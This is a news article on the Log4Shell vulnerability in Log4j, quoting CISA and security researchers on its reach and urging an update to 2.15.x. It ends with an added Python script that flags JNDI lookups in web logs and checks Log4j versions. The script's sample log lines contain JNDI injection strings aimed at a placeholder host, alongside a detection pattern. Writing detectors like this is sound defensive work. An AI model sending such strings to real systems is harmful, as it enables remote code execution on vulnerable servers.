The zero-day flaw CVE-2021-44228, christened Log4Shell, represents a major cybersecurity issue that will take months, even years, to be completely resolved, owing to its spread and to the ease with which the flaw itself can be exploited: this is the opinion on which various computer security researchers converge after Log4Shell came to light on Thursday, December 9.
The United States Cybersecurity and Infrastructure Security Agency (CISA) has also weighed in, pointing out that the vulnerability affects hundreds of millions of devices and that “no single action will fix the problem”, and stating that it is a mistake to think that things can be fixed “in a week or two”. CISA warns that the vulnerability will likely be exploited as a springboard for diverse and sophisticated types of attacks and compromises, and that the window for putting protections in place is really limited.
We remind you that Log4Shell is a vulnerability affecting the open-source Java tool Log4j, widely used for logging in a vast number of applications and services, and that it allows unauthenticated remote code execution. Its distribution is therefore extremely wide, which, combined with the ease of exploiting the flaw, makes Log4Shell a particularly serious threat, even more significant than Heartbleed, EternalBlue or Shellshock.
While, at least for now, the vulnerability appears to have been exploited primarily to deliver cryptomining malware, security researchers expect to see an evolution in the type of attacks. The ability to execute unauthenticated remote code in a simple way opens up a wide range of possibilities for attackers. Steve Povolny, head of advanced threat research for McAfee Enterprise and FireEye, observed that, given the surge of activity following the discovery of the flaw, it is reasonable to assume that many organizations may have already been compromised. Povolny also warns that the attacks are likely to evolve.
Sean Gallagher, researcher at Sophos, pointed out in particular that the vulnerability could be exploited by attackers attempting to install remote access and persistence tools, and that it is already being used in attempts to expose keys used by Amazon Web Services accounts.
hear people saying #log4shell is “as bad as heartbleed” – imo it’s way worse. in addition to having RCE as an impact, the number of interdependencies around log4j (and in particular their age) is an order of magnitude higher
— cje (@caseyjohnellis) December 11, 2021
According to Casey John Ellis, security expert and founder of Bugcrowd, the problem is far more serious than Heartbleed, since Log4j’s propagation and its various interdependencies are “orders of magnitude higher”. Florian Roth of Nextron Systems speaks of a “0day cluster bomb”: Log4Shell is a vulnerability that can potentially cause hundreds and thousands more zero-day flaws in all kinds of software.
What people seem to miss:
The #Log4Shell vulnerability is not just a 0day RCE.
It’s a vulnerability that causes hundreds and thousands of 0 days in all sorts of software products.
It’s a 0day cluster bomb. pic.twitter.com/Cij9kK4Cvg
— Florian Roth ️ (@cyb3rops) December 11, 2021
And with particular regard to how widespread the problem is, Jaana Dogan, lead engineer at AWS, provides additional context:
A project with a footprint like Log4j cannot be avoided as a transient dependency even if you don’t import it directly. Log4j is a canonical logging utility for a huge ecosystem. Its current radius goes beyond due diligence. https://t.co/FqSr68x7JL
— Jaana Dogan ヤナドガン (@rakyll) December 13, 2021
The immediate action to take to eliminate the flaw is to update Log4j to at least version 2.15.x, which requires Java 8. Those who cannot update Log4j because of complex interdependencies can fall back on partial, temporary solutions, well summarized in this complete and in-depth collection on Log4Shell.
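Two checks a defender can run straight away, as an added example that is not part of the original article or of any vendor tooling: a triage pass over web-server log lines that flags the `${jndi:` lookup string Log4Shell abuses and counts hits per source address, and a version comparison against the 2.15.x minimum the article cites. The log lines and IP addresses are constructed for the example, and the function names are assumptions of this example, not any published API.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not real traffic). Lines 1 and 2 carry
# a JNDI lookup string in the User-Agent field; lines 3 and 4 are benign, and
# line 4 deliberately contains a non-JNDI Log4j lookup that must NOT be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:12:03 +0000] "GET /login HTTP/1.1" 200 833 "-" "Mozilla/5.0 ${JNDI:rmi://example.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:05 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:10:12:07 +0000] "POST /api HTTP/1.1" 201 40 "-" "${sys:user.home}"',
]

# Case-insensitive match on the lookup prefix; whitespace around the colon is tolerated.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Source address is the first whitespace-delimited token of a combined-format line.
SOURCE_PATTERN = re.compile(r"^(\S+)")

# Minimum fixed version named in the article.
MINIMUM_LOG4J_VERSION = (2, 15, 0)


def classify_line(line):
    """Return the list of detection reasons for a log line (empty means benign)."""
    reasons = []
    if JNDI_PATTERN.search(line):
        reasons.append("jndi-lookup")
    return reasons


def summarize_hits(lines):
    """Count flagged lines per source address so responders can prioritise."""
    hits = Counter()
    for line in lines:
        if classify_line(line):
            match = SOURCE_PATTERN.match(line)
            source = match.group(1) if match else "<unknown>"
            hits[source] += 1
    return dict(hits)


def parse_version(version):
    """Turn '2.15.0' (or '2.15.0-rc1') into a comparable tuple of integers."""
    parts = [int(p) for p in re.findall(r"\d+", version)][:3]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def meets_minimum_version(version):
    """True if the given Log4j version is at or above the article's 2.15.x minimum."""
    return parse_version(version) >= MINIMUM_LOG4J_VERSION


if __name__ == "__main__":
    for index, line in enumerate(SAMPLE_LOG_LINES, start=1):
        print(f"line {index}: {classify_line(line) or 'benign'}")
    print("hits per source:", summarize_hits(SAMPLE_LOG_LINES))
    for v in ("2.14.1", "2.15.0"):
        print(f"log4j {v}: {'ok' if meets_minimum_version(v) else 'UPDATE REQUIRED'}")
```

The pattern is deliberately narrow: it looks for the literal lookup prefix and nothing else, so a clean log produces no noise, and a hit is a strong enough signal to pull the request for a closer look. Feeding it a real access log is a matter of replacing the constructed list with the file's lines.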